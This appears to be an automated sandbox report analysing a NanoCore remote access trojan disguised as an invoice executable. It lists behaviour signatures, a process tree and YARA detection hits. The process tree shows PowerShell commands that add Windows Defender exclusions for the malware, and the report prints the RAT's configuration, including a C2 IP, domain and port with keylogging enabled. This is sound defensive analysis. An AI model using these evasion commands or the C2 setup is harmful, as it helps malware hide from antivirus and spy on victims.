Play interactive tour

Edit tour

Analysis Report CN-Invoice-XXXXX9808-19011143287989.exe

Overview

General Information

Sample Name:	CN-Invoice-XXXXX9808-19011143287989.exe
Analysis ID:	356721
MD5:	e9cd061b2286d8098153c9d9e2ed0b4b
SHA1:	e30565df7c0597a76857532e4ca7df6d2728e7b5
SHA256:	520fae27134b14bb92d3858083c08496cee8b1c7631f0a374c5e168adfa799f2
Tags:	exeNanoCoresigned
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Nanocore Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: NanoCore

System process connects to network (likely due to code injection or exploit)

Yara detected Nanocore RAT

Adds a directory exclusion to Windows Defender

Binary contains a suspicious time stamp

C2 URLs / IPs found in malware configuration

Drops PE files with benign system names

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Sigma detected: Suspicious Svchost Process

Sigma detected: System File Execution Location Anomaly

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to detect virtual machines (SLDT)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w10x64

CN-Invoice-XXXXX9808-19011143287989.exe (PID: 6200 cmdline: 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' MD5: E9CD061B2286D8098153C9D9E2ED0B4B)

powershell.exe (PID: 5864 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

AdvancedRun.exe (PID: 744 cmdline: 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)

AdvancedRun.exe (PID: 7016 cmdline: 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /SpecialRun 4101d8 744 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)

powershell.exe (PID: 6992 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4780 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 4240 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

CasPol.exe (PID: 4244 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)

CasPol.exe (PID: 4928 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)

CasPol.exe (PID: 6880 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)

WerFault.exe (PID: 7040 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 2152 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 5888 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

explorer.exe (PID: 7132 cmdline: 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)

explorer.exe (PID: 7060 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)

svchost.exe (PID: 6140 cmdline: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' MD5: E9CD061B2286D8098153C9D9E2ED0B4B)

svchost.exe (PID: 6020 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

explorer.exe (PID: 4876 cmdline: 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)

explorer.exe (PID: 6180 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)

svchost.exe (PID: 3524 cmdline: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' MD5: E9CD061B2286D8098153C9D9E2ED0B4B)

powershell.exe (PID: 6996 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 7048 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5800 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

WerFault.exe (PID: 1320 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6200 -ip 6200 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 6652 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5588 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "5c958888-f81c-42a4-939d-31983a2cd9ba", "Group": "wuzzy122", "Domain1": "185.157.160.233", "Domain2": "annapro.linkpc.net", "Port": 2212, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1056d:$x1: NanoCore.ClientPluginHost 0x4338d:$x1: NanoCore.ClientPluginHost 0x75fad:$x1: NanoCore.ClientPluginHost 0x105aa:$x2: IClientNetworkHost 0x433ca:$x2: IClientNetworkHost 0x75fea:$x2: IClientNetworkHost 0x140dd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x79b1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x102d5:$a: NanoCore 0x102e5:$a: NanoCore 0x10519:$a: NanoCore 0x1052d:$a: NanoCore 0x1056d:$a: NanoCore 0x430f5:$a: NanoCore 0x43105:$a: NanoCore 0x43339:$a: NanoCore 0x4334d:$a: NanoCore 0x4338d:$a: NanoCore 0x75d15:$a: NanoCore 0x75d25:$a: NanoCore 0x75f59:$a: NanoCore 0x75f6d:$a: NanoCore 0x75fad:$a: NanoCore 0x10334:$b: ClientPlugin 0x10536:$b: ClientPlugin 0x10576:$b: ClientPlugin 0x43154:$b: ClientPlugin 0x43356:$b: ClientPlugin 0x43396:$b: ClientPlugin
00000019.00000002.948080441.0000000003121000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x101a5:$x1: NanoCore.ClientPluginHost 0x101e2:$x2: IClientNetworkHost 0x13d15:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xff0d:$a: NanoCore 0xff1d:$a: NanoCore 0x10151:$a: NanoCore 0x10165:$a: NanoCore 0x101a5:$a: NanoCore 0xff6c:$b: ClientPlugin 0x1016e:$b: ClientPlugin 0x101ae:$b: ClientPlugin 0x10093:$c: ProjectData 0x10a9a:$d: DESCrypto 0x18466:$e: KeepAlive 0x16454:$g: LogClientMessage 0x1264f:$i: get_Connected 0x10dd0:$j: #=q 0x10e00:$j: #=q 0x10e1c:$j: #=q 0x10e4c:$j: #=q 0x10e68:$j: #=q 0x10e84:$j: #=q 0x10eb4:$j: #=q 0x10ed0:$j: #=q
00000019.00000002.956836071.0000000005460000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000019.00000002.956836071.0000000005460000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x42f25:$a: NanoCore 0x42f7e:$a: NanoCore 0x42fbb:$a: NanoCore 0x43034:$a: NanoCore 0x566df:$a: NanoCore 0x566f4:$a: NanoCore 0x56729:$a: NanoCore 0x6f1ab:$a: NanoCore 0x6f1c0:$a: NanoCore 0x6f1f5:$a: NanoCore 0x42f87:$b: ClientPlugin 0x42fc4:$b: ClientPlugin 0x438c2:$b: ClientPlugin 0x438cf:$b: ClientPlugin 0x5649b:$b: ClientPlugin 0x564b6:$b: ClientPlugin 0x564e6:$b: ClientPlugin 0x566fd:$b: ClientPlugin 0x56732:$b: ClientPlugin 0x6ef67:$b: ClientPlugin 0x6ef82:$b: ClientPlugin
00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10885:$x1: NanoCore.ClientPluginHost 0x434a5:$x1: NanoCore.ClientPluginHost 0x108c2:$x2: IClientNetworkHost 0x434e2:$x2: IClientNetworkHost 0x143f5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x47015:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x105ed:$a: NanoCore 0x105fd:$a: NanoCore 0x10831:$a: NanoCore 0x10845:$a: NanoCore 0x10885:$a: NanoCore 0x4320d:$a: NanoCore 0x4321d:$a: NanoCore 0x43451:$a: NanoCore 0x43465:$a: NanoCore 0x434a5:$a: NanoCore 0x1064c:$b: ClientPlugin 0x1084e:$b: ClientPlugin 0x1088e:$b: ClientPlugin 0x4326c:$b: ClientPlugin 0x4346e:$b: ClientPlugin 0x434ae:$b: ClientPlugin 0x10773:$c: ProjectData 0x43393:$c: ProjectData 0x1117a:$d: DESCrypto 0x43d9a:$d: DESCrypto 0x18b46:$e: KeepAlive
00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10cdd:$x1: NanoCore.ClientPluginHost 0x43afd:$x1: NanoCore.ClientPluginHost 0x7671d:$x1: NanoCore.ClientPluginHost 0x10d1a:$x2: IClientNetworkHost 0x43b3a:$x2: IClientNetworkHost 0x7675a:$x2: IClientNetworkHost 0x1484d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4766d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x7a28d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10a45:$a: NanoCore 0x10a55:$a: NanoCore 0x10c89:$a: NanoCore 0x10c9d:$a: NanoCore 0x10cdd:$a: NanoCore 0x43865:$a: NanoCore 0x43875:$a: NanoCore 0x43aa9:$a: NanoCore 0x43abd:$a: NanoCore 0x43afd:$a: NanoCore 0x76485:$a: NanoCore 0x76495:$a: NanoCore 0x766c9:$a: NanoCore 0x766dd:$a: NanoCore 0x7671d:$a: NanoCore 0x10aa4:$b: ClientPlugin 0x10ca6:$b: ClientPlugin 0x10ce6:$b: ClientPlugin 0x438c4:$b: ClientPlugin 0x43ac6:$b: ClientPlugin 0x43b06:$b: ClientPlugin
Process Memory Space: svchost.exe PID: 6140	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xdf2035:$x1: NanoCore.ClientPluginHost 0xe10f72:$x1: NanoCore.ClientPluginHost 0xe2fdc2:$x1: NanoCore.ClientPluginHost 0xdf2096:$x2: IClientNetworkHost 0xe10fd3:$x2: IClientNetworkHost 0xe2fe23:$x2: IClientNetworkHost 0xdf749b:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xe0540d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xe163d8:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xe2434a:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xe35228:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xe4319a:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: svchost.exe PID: 6140	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: svchost.exe PID: 6140	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xdf1b3a:$a: NanoCore 0xdf1b56:$a: NanoCore 0xdf1cb1:$a: NanoCore 0xdf1cc0:$a: NanoCore 0xdf1f99:$a: NanoCore 0xdf1fc5:$a: NanoCore 0xdf2035:$a: NanoCore 0xe01a77:$a: NanoCore 0xe01a89:$a: NanoCore 0xe01ac5:$a: NanoCore 0xe10a77:$a: NanoCore 0xe10a93:$a: NanoCore 0xe10bee:$a: NanoCore 0xe10bfd:$a: NanoCore 0xe10ed6:$a: NanoCore 0xe10f02:$a: NanoCore 0xe10f72:$a: NanoCore 0xe209b4:$a: NanoCore 0xe209c6:$a: NanoCore 0xe20a02:$a: NanoCore 0xe2f8c7:$a: NanoCore
Process Memory Space: svchost.exe PID: 3524	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xbef31:$x1: NanoCore.ClientPluginHost 0xbef92:$x2: IClientNetworkHost 0xc4397:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xd2309:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: svchost.exe PID: 3524	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: svchost.exe PID: 3524	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xbea36:$a: NanoCore 0xbea52:$a: NanoCore 0xbebad:$a: NanoCore 0xbebbc:$a: NanoCore 0xbee95:$a: NanoCore 0xbeec1:$a: NanoCore 0xbef31:$a: NanoCore 0xce973:$a: NanoCore 0xce985:$a: NanoCore 0xce9c1:$a: NanoCore 0xbeadd:$b: ClientPlugin 0xbec06:$b: ClientPlugin 0xbeeca:$b: ClientPlugin 0xbef3a:$b: ClientPlugin 0xce98e:$b: ClientPlugin 0xce9ca:$b: ClientPlugin 0xbed53:$c: ProjectData 0xce8c0:$c: ProjectData 0x2c4962:$c: ProjectData 0x2cd9a2:$c: ProjectData 0x30956b:$c: ProjectData
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
22.2.svchost.exe.532d6f8.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x42dad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x42dea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4691d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
22.2.svchost.exe.532d6f8.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.svchost.exe.532d6f8.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x42b15:$a: NanoCore 0x42b25:$a: NanoCore 0x42d59:$a: NanoCore 0x42d6d:$a: NanoCore 0x42dad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x42b74:$b: ClientPlugin 0x42d76:$b: ClientPlugin 0x42db6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x42c9b:$c: ProjectData 0x10a82:$d: DESCrypto 0x436a2:$d: DESCrypto 0x1844e:$e: KeepAlive
25.2.CasPol.exe.5840000.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
25.2.CasPol.exe.5840000.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
25.2.CasPol.exe.5840000.9.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
25.2.CasPol.exe.41745a5.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x23c50:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x23c7d:$x2: IClientNetworkHost
25.2.CasPol.exe.41745a5.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x23c50:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x24d2b:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x23c6a:$s5: IClientLoggingHost
25.2.CasPol.exe.41745a5.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x42fad:$x1: NanoCore.ClientPluginHost 0x75bcd:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x42fea:$x2: IClientNetworkHost 0x75c0a:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46b1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x7973d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x42d15:$a: NanoCore 0x42d25:$a: NanoCore 0x42f59:$a: NanoCore 0x42f6d:$a: NanoCore 0x42fad:$a: NanoCore 0x75935:$a: NanoCore 0x75945:$a: NanoCore 0x75b79:$a: NanoCore 0x75b8d:$a: NanoCore 0x75bcd:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x42d74:$b: ClientPlugin 0x42f76:$b: ClientPlugin 0x42fb6:$b: ClientPlugin
25.2.CasPol.exe.314dd48.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
25.2.CasPol.exe.314dd48.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
